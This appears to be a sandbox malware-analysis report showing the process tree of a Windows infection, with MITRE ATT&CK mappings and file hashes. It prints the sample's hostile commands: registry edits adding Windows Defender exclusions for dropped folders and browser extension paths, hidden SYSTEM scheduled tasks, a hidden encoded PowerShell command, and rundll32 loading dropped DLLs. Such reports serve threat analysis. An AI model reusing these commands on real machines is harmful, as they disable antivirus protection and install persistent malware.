C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtGdUAqPaeUn" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jZYvVmedU" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jZYvVmedU" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mSxonuyZddWDC" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mSxonuyZddWDC" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qSWBhTzYETvU2" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qSWBhTzYETvU2" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\jaTziRFwMbpUQIVB /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\jaTziRFwMbpUQIVB /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\TLUiaIkgDaAGYJZgP /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\TLUiaIkgDaAGYJZgP /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\XCjbzLTchVkZHDyu /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\XCjbzLTchVkZHDyu /t REG_DWORD /d 0 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glNRZfVWu" /SC once /ST 03:17:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glNRZfVWu"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glNRZfVWu"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NcLpygPSSrtuPTsfl" /SC once /ST 06:44:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\XCjbzLTchVkZHDyu\SxnvoZUrdEWDPMo\AyaLRAY.exe\" ZL /DAeZdidPv 757674 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NcLpygPSSrtuPTsfl"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 8002⤵
- Program crash
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\XCjbzLTchVkZHDyu\SxnvoZUrdEWDPMo\AyaLRAY.exeC:\Windows\Temp\XCjbzLTchVkZHDyu\SxnvoZUrdEWDPMo\AyaLRAY.exe ZL /DAeZdidPv 757674 /S1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bpHydXXKbQRQpHUipK"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jZYvVmedU\cKZIls.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "YQlnRmzqGdUHKZo" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YQlnRmzqGdUHKZo2" /F /xml "C:\Program Files (x86)\jZYvVmedU\WpsqAjS.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YQlnRmzqGdUHKZo"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YQlnRmzqGdUHKZo"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yYXCDxtAQPBWfr" /F /xml "C:\Program Files (x86)\qSWBhTzYETvU2\rcscFev.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WCxChHsRcXqgS2" /F /xml "C:\ProgramData\jaTziRFwMbpUQIVB\CeilaCN.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "szCZkNPYYCTEZEBpE2" /F /xml "C:\Program Files (x86)\DiQsdyKfwcNcwZtTcVR\EBRugmY.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FfZNyoBYhpycJIhnCAA2" /F /xml "C:\Program Files (x86)\mSxonuyZddWDC\HZQRXYB.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qXjBTgYAsrodjviDu" /SC once /ST 09:19:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\XCjbzLTchVkZHDyu\PuQdtxVn\VfuHJGJ.dll\",#1 /fNlzdidapdx 757674" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qXjBTgYAsrodjviDu"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BQZbY1" /SC once /ST 04:18:10 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Programs\Opera\launcher.exe\" --restore-last-session"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BQZbY1"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RIXxx1" /SC once /ST 06:34:50 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "RIXxx1"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RIXxx1"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BQZbY1"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NcLpygPSSrtuPTsfl"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7408 -s 25642⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2868 -ip 28681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3192 -ip 31921⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\XCjbzLTchVkZHDyu\PuQdtxVn\VfuHJGJ.dll",#1 /fNlzdidapdx 7576741⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\XCjbzLTchVkZHDyu\PuQdtxVn\VfuHJGJ.dll",#1 /fNlzdidapdx 7576742⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qXjBTgYAsrodjviDu"3⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3192 -ip 31921⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc23e93cb8,0x7ffc23e93cc8,0x7ffc23e93cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2108 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:32⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2224 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6748 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6324 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10226497454950930256,15251766371153069724,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2488 /prefetch:22⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3112 -ip 31121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 7408 -ip 74081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 3192 -ip 31921⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004C41⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3192 -ip 31921⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004C41⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3192 -ip 31921⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Modify Registry
3Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
641KB
MD5e002071461c028c05e723f5a0c1bf254
SHA1af096f0679145ea363a1b5f935ae392a4188cb05
SHA256daa7367d62f3ce12b7c999fd8c1f53d39d738ebbbfcff9f7be3cfba135621411
SHA512e9fefec55b8e6b3da735dbf565116841704ab74f6b360230c2e147d762bb122c2d1e734e7db04f5257922f20c983204db2b1663533a5ac11c638bf202802405f
-
Filesize
28KB
MD5b32b3e4dff5a38135fb4b6eca7db6060
SHA1c68e59f3342f39a68cab627665acd4a8e18c2516
SHA256c0eeffa6eba75c15db545198903f9d7536521762f7d55dc2ba6cab8f487919fa
SHA512f62862e6c71a749d4ee7c0d30edf9a0c0abd05cd73b8ae5e5862678e8b3266cde7c039e29956953ee94d43f2db2fa2025919789d0e4afa236047373ccbd80126
-
Filesize
781KB
MD50303b15a536f0383aecca1737e6e2d29
SHA1001eb9623de95cadd4f8ec2ff1a571fb649e0938
SHA256e788f9d007f9ceb41616b0b1165ffb94c6649956b8873583fee5bbaa5a1ce94f
SHA51276979e5e4ba68dc23746ab2ff2a7dbf63f12d5abdcdaa2925fce9ddec2d78e6e46d073b6199a11cebd57994624ac344b4ab0d1c24850e8749e03a49d3943fc73
-
Filesize
100KB
MD5ab45c071f3c430ff80019799b6c49fd5
SHA194f429c76a3e7e2accc850e492450fa8904eb1d5
SHA256ef4db92010d70e632296ac93ad0f2bbc3b1b3098ad397a5a4f6e134818530305
SHA512052f784d20f4a7b0a9f537384d17f00823ba805f811c57c2b7b2ac8d5c38ade005df2d4ee7daaebe76c5fef8aee1ff5acfe49e80094033fee422b2bb5cce13d5
-
Filesize
1.5MB
MD5a81f5fb9cec6a8ab27128e741bba8168
SHA10cb5fb7ed33b5cb418fa679175e87e70cf1d8ee8
